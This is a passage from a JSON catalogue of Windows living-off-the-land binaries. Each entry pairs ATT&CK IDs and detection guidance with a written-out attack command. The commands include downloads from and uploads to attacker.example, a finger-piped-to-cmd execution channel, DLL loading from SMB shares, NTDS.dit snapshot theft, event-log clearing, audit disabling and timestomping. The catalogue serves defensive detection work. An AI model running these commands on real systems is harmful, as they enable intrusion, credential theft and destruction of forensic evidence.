URL.","mitre":["T1218.007","T1105"],"privilege":"user","detection":[{"type":"Detection","value":"msiexec.exe with an http(s):// argument or a network-facing parent; msiexec.exe spawning cmd.exe/powershell.exe/rundll32; MSI or MST files written into INetCache; TRANSFORMS= pointing at a URL."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msiexec.yml","https://attack.mitre.org/techniques/T1218/007/"],"added":true,"verifyNote":"LOLBAS Msiexec.yml quotes both `msiexec /q /i {REMOTEURL}` and `msiexec /i {PATH} TRANSFORMS=\"{REMOTEURL:.mst}\" /qb`, MitreID T1218.007; verbatim match."},{"id":"daemon:curl:16","toolId":"daemon:curl","toolName":"curl.exe","name":"Download","source":"DAEMON","platform":["Windows","Linux","macOS"],"capability":["File Download","File Upload"],"nativeCategory":["Download","Upload"],"command":"curl.exe -o C:\\Windows\\Temp\\x.exe http://attacker.example/x.exe\ncurl.exe -T C:\\Windows\\Temp\\loot.zip http://attacker.example/upload/","description":"curl.exe has shipped in-box on Windows 10 since build 1803 (and on macOS/Linux for years). -o/--output writes a downloaded URL to a chosen path (ingress transfer) and -T/--upload-file (or -d/--data for POST) exfiltrates a local file to a remote server, all from a Microsoft-signed binary.","usecase":"Download a payload or stage/exfiltrate data using a built-in, trusted HTTP client instead of certutil/bitsadmin.","mitre":["T1105","T1567"],"privilege":"user","detection":[{"type":"Detection","value":"curl.exe writing executable/script content with -o/-O; curl.exe -T/--upload-file or -d to external hosts; curl.exe with a non-interactive parent (office, script host); egress to newly-seen domains from curl.exe."}],"references":["https://curl.se/docs/manpage.html","https://curl.se/windows/"],"added":true,"verifyNote":"curl.se manpage documents -o/--output and -T/--upload-file (and -d/--data) exactly as described; curl.se/windows confirms the Microsoft-signed in-box build."},{"id":"daemon:tar:17","toolId":"daemon:tar","toolName":"tar.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Defense Evasion"],"nativeCategory":["Download","Hide/ADS"],"command":"tar.exe -xf \\\\10.10.10.10\\share\\x.tar -C C:\\Windows\\Temp\ntar.exe -cf C:\\Windows\\Temp\\x.txt:evil.tar C:\\Windows\\Temp\\payload","description":"The in-box bsdtar (Windows 10 1803+) extracts an archive directly from a UNC/SMB path, pulling files from a remote host without a classic downloader (ingress transfer). tar can also read from and write to NTFS Alternate Data Streams (path:ads), hiding archived payloads inside a benign-looking file.","usecase":"Copy files in from a remote share, or stash a payload in an ADS to evade file-based detection, using a signed archiver.","mitre":["T1105","T1564.004"],"privilege":"user","detection":[{"type":"Detection","value":"tar.exe with a UNC (\\\\host\\share) source; tar.exe archive paths containing ':' (ADS notation); tar.exe making SMB/network connections; extraction into system-writable temp dirs."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Tar.yml","https://learn.microsoft.com/en-us/windows/tar/"],"added":true,"verifyNote":"LOLBAS Tar.yml documents `tar -xf {PATH_SMB:.tar}` (T1105) and `tar -cf {PATH}:ads {folder}` / `tar -xf {PATH}:ads` (T1564.004); both match."},{"id":"daemon:ssh:18","toolId":"daemon:ssh","toolName":"ssh.exe","name":"Execute","source":"DAEMON","platform":["Windows","Linux","macOS"],"capability":["Execution","Library Load"],"nativeCategory":["Execute"],"command":"ssh.exe -o ProxyCommand=\"C:\\Windows\\Temp\\x.exe\" .\nssh.exe -o PKCS11Provider=\"\\\\10.10.10.10\\Temp\\x.dll\" user@test.local","description":"The in-box OpenSSH client (Windows 10 1809+) runs the string given in ProxyCommand/LocalCommand through the shell before it ever connects, giving indirect command execution under a signed binary. The PKCS11Provider option loads and executes an attacker DLL (DllMain / C_GetFunctionList) from a remote SMB share.","usecase":"Proxy-execute a command or side-load a DLL from a signed, trusted SSH client for defense evasion.","mitre":["T1202","T1218"],"privilege":"user","detection":[{"type":"Detection","value":"ssh.exe with ProxyCommand/LocalCommand/PKCS11Provider on the command line; ssh.exe spawning cmd.exe/powershell.exe; ssh.exe loading a non-standard DLL from a UNC path; ssh.exe run with no legitimate remote host."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Ssh.yml","https://attack.mitre.org/techniques/T1202/"],"added":true,"verifyNote":"LOLBAS Ssh.yml quotes `ssh -o ProxyCommand=\"{CMD}\" .` and `ssh -o PKCS11Provider=\"\\\\...\\example.dll\"` (DLL from SMB share), MitreID T1202; match. NOTE: secondary T1218 tag flagged in suspect — the PKCS11 DLL load maps better to T1574.002/T1129."},{"id":"daemon:scp:19","toolId":"daemon:scp","toolName":"scp.exe","name":"Execute","source":"DAEMON","platform":["Windows","Linux","macOS"],"capability":["Execution","File Copy"],"nativeCategory":["Execute"],"command":"scp.exe -S C:\\Windows\\Temp\\x.exe . localhost:.\nscp.exe -o ProxyCommand=\"C:\\Windows\\Temp\\x.exe\" . localhost:.","description":"The in-box OpenSSH scp client spawns the program named by -S (alternate ssh program) or ProxyCommand even when no SSH server is listening, giving indirect command execution under a signed binary. scp also legitimately copies files to/from remote hosts and can be used to stage or exfiltrate data.","usecase":"Proxy-execute a command through scp->ssh, or move files off-host, using a signed binary.","mitre":["T1202","T1105"],"privilege":"user","detection":[{"type":"Detection","value":"scp.exe with -S or -o ProxyCommand; scp.exe child processes (cmd/powershell); scp.exe copying to/from external hosts; scp targeting localhost with no SSH service present."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Scp.yml","https://attack.mitre.org/techniques/T1202/"],"added":true,"verifyNote":"LOLBAS Scp.yml quotes both `scp.exe -S \"{CMD}\" . localhost:.` and `scp.exe -o ProxyCommand=\"{CMD}\" . localhost:.` (spawns even with no SSH), MitreID T1202; match."},{"id":"daemon:msedge:20","toolId":"daemon:msedge","toolName":"msedge.exe","name":"Download","source":"DAEMON","platform":["Windows","macOS","Linux"],"capability":["File Download","Execution"],"nativeCategory":["Download","Execute"],"command":"msedge.exe --headless --enable-logging --disable-gpu --dump-dom \"https://attacker.example/x.base64.html\" > C:\\Windows\\Temp\\x.b64\nmsedge.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\Temp\\x.exe &&\"","description":"Chromium browsers (Edge is preinstalled and signed; chrome.exe behaves identically) print the rendered DOM to stdout with --headless --dump-dom, letting an operator pull a base64 payload disguised as an .html page with no classic downloader on the command line. The --gpu-launcher switch runs an arbitrary command as a child of the signed browser (system binary proxy execution).","usecase":"Silently download a payload via a trusted browser, or proxy-execute a command under a signed browser process.","mitre":["T1105","T1218"],"privilege":"user","detection":[{"type":"Detection","value":"browser process (msedge.exe/chrome.exe) with --headless together with --dump-dom, or with --gpu-launcher/--utility-cmd-prefix/--renderer-cmd-prefix; browser redirecting stdout to a file; browser process whose parent is a script host or Office app."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msedge.yml","https://twitter.com/mrd0x/status/1478234484881436672"],"added":true,"verifyNote":"LOLBAS Msedge.yml (OSBinaries) documents `--headless --enable-logging --disable-gpu --dump-dom` (T1105) and `--disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"` (T1218.015); reference URL corrected to the OSBinaries YAML path."},{"id":"daemon:mpcmdrun:21","toolId":"daemon:mpcmdrun","toolName":"MpCmdRun.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Defense Evasion"],"nativeCategory":["Download","ADS"],"command":"MpCmdRun.exe -DownloadFile -url https://attacker.example/x.exe -path C:\\Windows\\Temp\\x.exe\nMpCmdRun.exe -DownloadFile -url https://attacker.example/x.exe -path C:\\Windows\\Temp\\x.exe:evil.exe","description":"Microsoft Defender's command-line utility (MpCmdRun.exe) downloads an arbitrary URL to disk with -DownloadFile (slashes or dashes both work), and can drop the file straight into an NTFS Alternate Data Stream. It is a signed AV binary, so the transfer blends in. Microsoft removed the flag in newer builds, but older platform copies remain abusable.","usecase":"Download a payload (optionally hidden in an ADS) using the trusted Defender binary itself.","mitre":["T1105","T1564.004"],"privilege":"user","detection":[{"type":"Detection","value":"MpCmdRun.exe with -DownloadFile/-url/-path; MpCmdRun.exe launched from a non-Defender directory or by an unexpected parent; network egress from MpCmdRun.exe to non-Microsoft hosts; -path containing ':' (ADS)."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/MpCmdRun.yml","https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/"],"added":true,"verifyNote":"LOLBAS MpCmdRun.yml quotes `-DownloadFile -url {REMOTEURL:.exe} -path {PATH:.exe}` (T1105, slashes/dashes both work) and the `-path {PATH}:evil.exe` ADS variant (T1564.004); match."},{"id":"daemon:desktopimgdownldr:22","toolId":"daemon:desktopimgdownldr","toolName":"desktopimgdownldr.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Defense Evasion"],"nativeCategory":["Download"],"command":"set \"SYSTEMROOT=C:\\Windows\\Temp\" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://attacker.example/x.exe /eventName:desktopimgdownldr","description":"The Personalization CSP lock-screen tool downloads the URL given in /lockscreenurl to disk as a standard user. Overriding the SYSTEMROOT environment variable redirects the output to an attacker-chosen folder, and the PersonalizationCSP registry value seeded by the run can be deleted afterward to erase the trace.","usecase":"Download an arbitrary file with a native, signed Windows tool that is not certutil/bitsadmin.","mitre":["T1105"],"privilege":"user","detection":[{"type":"Detection","value":"desktopimgdownldr.exe with /lockscreenurl to a non-Microsoft host or fetching a non-image; SYSTEMROOT environment override before the run; writes/deletes at HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PersonalizationCSP\\LockScreenImageUrl."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Desktopimgdownldr.yml","https://www.sentinelone.com/labs/living-off-windows-land-a-new-native-file-downldr/"],"added":true,"verifyNote":"LOLBAS Desktopimgdownldr.yml quotes `set \"SYSTEMROOT=...\" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL}` (T1105); SentinelOne write-up is the original research source."},{"id":"daemon:appinstaller:23","toolId":"daemon:appinstaller","toolName":"AppInstaller.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"start ms-appinstaller://?source=https://attacker.example/x.msix","description":"The ms-appinstaller:// URI is handled by the signed App Installer (AppInstaller.exe), which reaches out to the source URL, attempts to load/install the package, and caches the fetched file in INetCache. The download rides a trusted protocol handler with no obvious downloader on the command line; the same handler underpinned real-world MotW-bypass delivery campaigns.","usecase":"Download a remote file/package through a trusted URI handler rather than an explicit HTTP client.","mitre":["T1105"],"privilege":"user","detection":[{"type":"Detection","value":"AppInstaller.exe making outbound connections to non-Microsoft hosts; ms-appinstaller:// URI invocations (e.g. via explorer/start); files appearing in INetCache attributed to AppInstaller.exe; MSIX/APPX pulled from untrusted domains."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/AppInstaller.yml","https://attack.mitre.org/techniques/T1105/"],"added":true,"verifyNote":"LOLBAS AppInstaller.yml quotes `start ms-appinstaller://?source={REMOTEURL:.exe}` and notes the file is 'saved in INetCache' (T1105); match. ms-appinstaller MotW-bypass abuse is publicly documented (Microsoft disabled the handler in 2023)."},{"id":"daemon:onedrivestandaloneupdater:24","toolId":"daemon:onedrivestandaloneupdater","toolName":"OneDriveStandaloneUpdater.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Defense Evasion"],"nativeCategory":["Download"],"command":"reg add \"HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\" /v UpdateRingSettingURLFromOC /t REG_SZ /d https://attacker.example/x /f && OneDriveStandaloneUpdater.exe","description":"The signed OneDrive updater downloads from the URL stored in the user-writable registry value HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC. Setting that value and launching the updater fetches an attacker-controlled file while the process command line stays completely benign.","usecase":"Download a file from the internet with a signed updater and no anomalous command-line arguments.","mitre":["T1105"],"privilege":"user","detection":[{"type":"Detection","value":"writes to HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC; OneDriveStandaloneUpdater.exe connecting to hosts outside the official OneDrive/Office update CDNs."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/OneDriveStandaloneUpdater.yml","https://attack.mitre.org/techniques/T1105/"],"added":true,"verifyNote":"LOLBAS OneDriveStandaloneUpdater.yml documents downloading from the URL in HKCU\\...\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC (T1105); match (LOLBAS also notes ODSUUpdateXMLUrlFromOC/UpdateXMLUrlFromOC must be non-empty)."},{"id":"daemon:finger:25","toolId":"daemon:finger","toolName":"finger.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Execution"],"nativeCategory":["Download"],"command":"finger user@attacker.example | more +2 | cmd","description":"The built-in Finger client retrieves data from a remote Finger (TCP/79) server; piping the server's response through more and into cmd turns the response into executed commands, giving a combined download-and-execute (and C2) channel over an unusual port with a signed binary.","usecase":"Retrieve and run attacker-supplied commands/payload over the rarely-monitored finger protocol.","mitre":["T1105"],"privilege":"user","detection":[{"type":"Detection","value":"finger.exe making outbound TCP/79 connections to external hosts; finger.exe piped into cmd.exe/powershell.exe/more; any use of finger.exe at all, which is rare in modern environments."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Finger.yml","https://attack.mitre.org/techniques/T1105/"],"added":true,"verifyNote":"LOLBAS Finger.yml quotes `finger user@example.host.com | more +2 | cmd` verbatim (T1105, Download); exact match."},{"id":"daemon:wsl:26","toolId":"daemon:wsl","toolName":"wsl.exe","name":"Execute","source":"DAEMON","platform":["Windows","Linux"],"capability":["Execution","File Download"],"nativeCategory":["Execute","Download"],"command":"wsl.exe --exec bash -c \"id > /mnt/c/Windows/Temp/x\"\nwsl.exe --exec bash -c 'cat < /dev/tcp/10.10.10.10/54 > /tmp/x'","description":"wsl.exe (signed, present where WSL is installed) runs arbitrary Linux commands via --exec/-e (as root with -u root, no password), giving indirect command execution under a trusted binary. bash's /dev/tcp pulls files with no external tool. wsl.exe also resolves its install path from HKLM\\...\\Lxss\\MSI\\InstallLocation, so a planted wsl.exe there is executed instead of the legitimate one.","usecase":"Execute payloads on the Linux side (evading Windows EDR), transfer files via /dev/tcp, or masquerade a payload as WSL.","mitre":["T1202","T1105","T1218"],"privilege":"user","detection":[{"type":"Detection","value":"wsl.exe with -e/--exec/-u root; wsl.exe/bash.exe spawning children outside System32; changes to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Lxss\\MSI\\InstallLocation; /dev/tcp usage inside WSL bash."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Wsl.yml","https://attack.mitre.org/techniques/T1202/"],"added":true,"verifyNote":"LOLBAS Wsl.yml documents `wsl.exe --exec bash -c \"{CMD}\"` (T1202), `wsl.exe --exec bash -c 'cat < /dev/tcp/.../.. > binary'` (T1105), and the HKLM\\...\\Lxss\\MSI\\InstallLocation lookup; match."},{"id":"daemon:winget:27","toolId":"daemon:winget","toolName":"winget.exe","name":"Execute","source":"DAEMON","platform":["Windows"],"capability":["Execution","AWL / Policy Bypass"],"nativeCategory":["Execute","AWL Bypass"],"command":"winget.exe install --manifest C:\\Windows\\Temp\\x.yml\nwinget.exe install --accept-package-agreements -s msstore {StoreID}","description":"The Windows Package Manager installs from a local manifest (--manifest) whose Installer URL points at an arbitrary file that is then downloaded and executed, or installs a Microsoft Store package by ID even when the Store app is blocked and AppLocker is active. Either path fetches and runs code through a signed installer, bypassing application-control policy.","usecase":"Download-and-execute an arbitrary installer, or pull software from the Store, past AppLocker/Store restrictions.","mitre":["T1105","T1218"],"privilege":"user","detection":[{"type":"Detection","value":"winget.exe install --manifest referencing a local/temp .yml; winget pulling installers from non-standard hosts; msstore installs where the Store app is policy-blocked; winget-spawned installer processes writing to unusual locations."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Winget.yml","https://learn.microsoft.com/en-us/windows/package-manager/winget/install"],"added":true,"verifyNote":"LOLBAS Winget.yml quotes `winget.exe install --manifest {PATH:.yml}` (download+execute, T1105) and `winget.exe install --accept-package-agreements -s msstore {name/ID}` (AWL Bypass, installs even if Store app blocked); match."},{"id":"daemon:devtunnel:28","toolId":"daemon:devtunnel","toolName":"devtunnel.exe","name":"Download","source":"DAEMON","platform":["Windows","Linux","macOS"],"capability":["File Upload","File Download"],"nativeCategory":["Download","Upload","Exfiltration"],"command":"devtunnel.exe host -p 8080","description":"The Microsoft Dev Tunnels agent (signed) exposes a local port/service on a Microsoft-hosted public *.devtunnels.ms URL. This creates an ingress/egress channel that can be used to reach internal services, stage tooling, or exfiltrate data, with the traffic riding trusted Microsoft tunneling infrastructure.","usecase":"Establish a trusted-domain tunnel for data transfer, exfiltration, or exposing an internal service to the internet.","mitre":["T1105","T1572","T1567"],"privilege":"user","detection":[{"type":"Detection","value":"devtunnel.exe execution and persistent connections to *.devtunnels.ms / global.rel.tunnels.api.visualstudio.com; internal services becoming reachable via a Microsoft tunnel domain; unexpected long-lived outbound sessions from devtunnel.exe."}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnels/","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/cli-commands"],"added":true,"verifyNote":"Microsoft Learn CLI reference documents `devtunnel host -p 3000` exposing a local port at a public *.devtunnels.ms URL; LOLBAS entry exists at OtherMSBinaries/devtunnels/ (reference URL corrected from the 404ing raw-YAML path to the working LOLBAS site page + MS Learn)."},{"id":"daemon:teams:29","toolId":"daemon:teams","toolName":"Teams.exe","name":"Execute","source":"DAEMON","platform":["Windows","macOS","Linux"],"capability":["Execution","Defense Evasion"],"nativeCategory":["Execute"],"command":"Teams.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\Temp\\x.exe &&\"","description":"Classic Microsoft Teams is an Electron/Chromium app, and the Chromium --gpu-launcher switch runs an arbitrary command as a child of the signed Teams binary (system binary proxy execution / parent masquerading). The same abuse applies to other Electron apps, and Teams can also be made to run planted JavaScript from its app.asar/package.json.","usecase":"Proxy-execute a command under a trusted, signed Electron binary to blend with normal process trees.","mitre":["T1218.015"],"privilege":"user","detection":[{"type":"Detection","value":"Teams.exe (or any Electron app) launched with --gpu-launcher/--disable-gpu-sandbox/--utility-cmd-prefix; Teams.exe spawning cmd.exe/powershell.exe; unexpected writes to app.asar or package.json under %LOCALAPPDATA%\\Microsoft\\Teams."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Teams.yml","https://attack.mitre.org/techniques/T1218/015/"],"added":true,"verifyNote":"LOLBAS Teams.yml quotes `teams.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"` and the app.asar/package.json JavaScript variants, all MitreID T1218.015 (Electron Applications); match."},{"id":"daemon:diskshadow:30","toolId":"daemon:diskshadow","toolName":"diskshadow.exe","name":"Execute","source":"DAEMON","platform":["Windows"],"capability":["Execution","Credential Access"],"nativeCategory":["Execute","Dump"],"command":"diskshadow.exe /s C:\\Windows\\Temp\\x.txt","description":"diskshadow's script mode (/s) runs each line of a text script; an exec line spawns a child process under a signed binary (indirect execution), while its VSS commands (set/create/expose) snapshot a volume so locked files like NTDS.dit or the SAM/SYSTEM hives can be copied out of the shadow copy. One signed tool covers both proxy execution and credential-store theft.","usecase":"Proxy-execute a command and/or snapshot the volume to copy NTDS.dit and registry hives for offline credential extraction.","mitre":["T1202","T1003.003"],"privilege":"admin","detection":[{"type":"Detection","value":"diskshadow.exe /s with a script file; diskshadow creating/exposing shadow copies; child processes spawned by diskshadow.exe; reads of NTDS.dit or SAM/SYSTEM via a shadow-copy path shortly after a snapshot."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Diskshadow.yml","https://attack.mitre.org/techniques/T1003/003/"],"added":true,"verifyNote":"LOLBAS Diskshadow.yml documents `diskshadow.exe /s {PATH:.txt}` (T1003.003, NTDS exfil via VSS) and `exec {PATH:.exe}` child-process spawn (T1202); FIX: removed T1006 — not in the LOLBAS mapping and diskshadow's VSS snapshot is squarely T1003.003, so only T1202+T1003.003 are retained."},{"id":"daemon:wevtutil:31","toolId":"daemon:wevtutil","toolName":"wevtutil.exe","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Clear Windows Event Logs"],"command":"wevtutil cl Security","description":"The built-in event log utility clears (empties) a named Windows Event Log channel with the cl / clear-log verb, destroying recorded evidence. An optional /bu: switch backs the log up first; adversaries omit it.","usecase":"Erase Security/System/Application logs after intrusion activity to remove indicators of compromise.","mitre":["T1070.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Alert on Security Event ID 1102 (audit log cleared) and System 104 (log file cleared). Log process creation (Sysmon 1 / Security 4688) for wevtutil.exe with 'cl' or 'clear-log' arguments; forward events to a SIEM so cleared local copies still survive centrally."}],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil"],"added":true,"verifyNote":"MS Learn wevtutil doc confirms 'cl|clear-log <Logname> [/bu:<Backup>]' clears a log (docs example: wevtutil cl Application /bu:...); maps to ATT&CK T1070.001. No change."},{"id":"daemon:wevtutil:32","toolId":"daemon:wevtutil","toolName":"wevtutil.exe","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable Windows Event Logging"],"command":"wevtutil sl Security /e:false","description":"The set-log (sl) verb with /e:false disables a Windows Event Log channel so future events for that channel are no longer written, blinding defenders without clearing existing entries.","usecase":"Disable Security or PowerShell operational channels before running noisy tooling so nothing is recorded.","mitre":["T1562.002","T1070.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Monitor process creation (Sysmon 1 / 4688) for wevtutil.exe with 'sl' plus '/e:false'. Watch Event ID 1100/1102/4719 (audit policy or log service state change) and alert on any channel being disabled, especially Security, System, and Microsoft-Windows-PowerShell/Operational."}],"references":["https://attack.mitre.org/techniques/T1562/002/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil"],"added":true,"verifyNote":"MS Learn wevtutil doc confirms 'sl|set-log' with '/e:<Enabled>' where Enabled is true or false ('Enables or disables a log'); primary ATT&CK ID T1562.002 is accurate (T1070.001 is a related secondary tag). No change."},{"id":"daemon:powershell:33","toolId":"daemon:powershell","toolName":"Clear-EventLog","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Clear Windows Event Logs"],"command":"Clear-EventLog -LogName Security","description":"The Windows PowerShell 5.1 Clear-EventLog cmdlet deletes all entries from a specified classic event log on a local or remote computer, an alternative to wevtutil for the same log-clearing effect.","usecase":"Clear event logs from within an existing PowerShell session without spawning wevtutil.exe.","mitre":["T1070.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Alert on Event ID 1102/104 as with any clear. Enable PowerShell Script Block Logging (4104) and Module Logging to capture the Clear-EventLog invocation; correlate with Sysmon 1 for powershell.exe. Sysmon's own channel typically survives a Security-log clear and preserves the trail."}],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/clear-eventlog"],"added":true,"verifyNote":"MS Learn confirms Clear-EventLog 'deletes all of the entries from the specified event logs on the local computer or on remote computers' (classic-log cmdlet, requires Administrators); ATT&CK T1070.001. No change."},{"id":"daemon:powershell:34","toolId":"daemon:powershell","toolName":"Remove-EventLog","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Clear Windows Event Logs"],"command":"Remove-EventLog -LogName Security","description":"The Windows PowerShell 5.1 Remove-EventLog cmdlet deletes a classic event log entirely and unregisters its event sources, which can suppress future logging for that log until it is recreated (often after reboot).","usecase":"Delete and deregister a log so the intrusion leaves less evidence and future events are not captured.","mitre":["T1070.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Capture the cmdlet via Script Block Logging (4104) and Sysmon 1 for powershell.exe. Baseline the expected set of registered event logs and alert when a standard log (Security, System, Application) is missing or its sources are deregistered."}],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/remove-eventlog?view=powershell-5.1"],"added":true,"verifyNote":"MS Learn (PS 5.1) confirms Remove-EventLog 'deletes an event log file ... and unregisters all its event sources'; classic EventLog cmdlet (5.1 only, not PS7). No change."},{"id":"daemon:auditpol:35","toolId":"daemon:auditpol","toolName":"auditpol.exe","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable Windows Event Logging"],"command":"auditpol /set /category:\"System\" /success:disable /failure:disable","description":"The built-in audit policy tool sets a subcategory or category to stop generating success/failure audit events; auditpol /clear /y wipes the entire advanced audit policy. Either action suppresses the events defenders rely on.","usecase":"Turn off auditing for noisy categories (e.g. process creation, logon) before operating, so key telemetry is never written.","mitre":["T1562.002"],"privilege":"admin","detection":[{"type":"Detection","value":"Alert on Event ID 4719 (System audit policy was changed) and 4907. Log process creation for auditpol.exe with '/set ... /success:disable', '/failure:disable', '/clear', or '/remove'. Periodically compare live 'auditpol /get /category:*' output against a known-good baseline."}],"references":["https://attack.mitre.org/techniques/T1562/002/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol"],"added":true,"verifyNote":"MS Learn auditpol-set confirms '/set ... /category:<name> /success:<enable|disable> /failure:<enable|disable>' and auditpol '/clear'/'/remove' sub-commands; ATT&CK T1562.002. No change."},{"id":"daemon:fsutil:36","toolId":"daemon:fsutil","toolName":"fsutil.exe","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Delete Volume USN Journal"],"command":"fsutil usn deletejournal /d C:","description":"The fsutil usn deletejournal subcommand with /d disables the NTFS Update Sequence Number (USN) change journal on a volume and deletes its records, destroying a key forensic timeline of file creation, deletion, and modification.","usecase":"Wipe the NTFS change journal to hamper forensic reconstruction of file-level activity on a compromised host.","mitre":["T1070"],"privilege":"admin","detection":[{"type":"Detection","value":"Log process creation (Sysmon 1 / 4688) for fsutil.exe with 'usn' and 'deletejournal'. During forensics, a reset USN journal ID or an abrupt discontinuity/gap in journal records indicates deletion; ship file-audit and journal data off-host in near real time."}],"references":["https://attack.mitre.org/techniques/T1070/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn"],"added":true,"verifyNote":"MS Learn fsutil-usn confirms 'fsutil usn deletejournal {/d|/n} <volumepath>' with '/d' disabling the active USN change journal (docs example: fsutil usn deletejournal /d c:); ATT&CK T1070. No change."},{"id":"daemon:attrib:37","toolId":"daemon:attrib","toolName":"attrib.exe","name":"Hide Artifacts","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Hide Artifacts","Hidden Files and Directories"],"command":"attrib +h +s C:\\Windows\\Temp\\x\\payload.exe","description":"The built-in attrib command sets the Hidden (+h) and System (+s) file attributes so a file is concealed from default Explorer and 'dir' views, a simple way to hide dropped artifacts on disk.","usecase":"Conceal a dropped executable or staging file from casual inspection of a directory.","mitre":["T1564.001"],"privilege":"user","detection":[{"type":"Detection","value":"Log process creation (Sysmon 1 / 4688) for attrib.exe with '+h' and especially '+s' on files in user-writable paths (Temp, ProgramData, AppData). Hunt the file system for files carrying both Hidden and System attributes in atypical locations."}],"references":["https://attack.mitre.org/techniques/T1564/001/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/attrib"],"added":true,"verifyNote":"MS Learn attrib doc confirms '{+|-}h' sets the Hidden and '{+|-}s' sets the System file attribute; ATT&CK T1564.001. No change."},{"id":"daemon:powershell:38","toolId":"daemon:powershell","toolName":"PowerShell","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Timestomp"],"command":"$(Get-Item C:\\Windows\\Temp\\x\\payload.exe).LastWriteTime = '01/01/2016 00:00:00'; [IO.File]::SetCreationTime('C:\\Windows\\Temp\\x\\payload.exe','01/01/2016')","description":"PowerShell can rewrite a file's $STANDARD_INFORMATION timestamps via the .CreationTime/.LastWriteTime/.LastAccessTime properties of a FileInfo object or the [System.IO.File]::SetCreationTime/SetLastWriteTime .NET methods, blending a malicious file in with legitimate neighbors (timestomping).","usecase":"Backdate or match a dropped file's MACE timestamps to defeat timeline analysis and 'recently modified' triage.","mitre":["T1070.006"],"privilege":"user","detection":[{"type":"Detection","value":"Sysmon Event ID 2 (FileCreateTime changed) flags user-mode $SI edits. Capture Script Block Logging (4104) for '.CreationTime =', '.LastWriteTime =', '[IO.File]::SetCreationTime', etc. In MFT forensics, a $STANDARD_INFORMATION timestamp earlier than the matching $FILE_NAME timestamp is a classic timestomp signature."}],"references":["https://attack.mitre.org/techniques/T1070/006/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"],"added":true,"verifyNote":"MS Learn .NET docs confirm System.IO.File.SetCreationTime/SetLastWriteTime and the FileInfo LastWriteTime/CreationTime settable properties; Atomic Red Team T1070.006 documents PowerShell timestomp; ATT&CK T1070.006. No change."},{"id":"daemon:powershell:39","toolId":"daemon:powershell","toolName":"Add-MpPreference","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable or Modify Tools"],"command":"Add-MpPreference -ExclusionPath 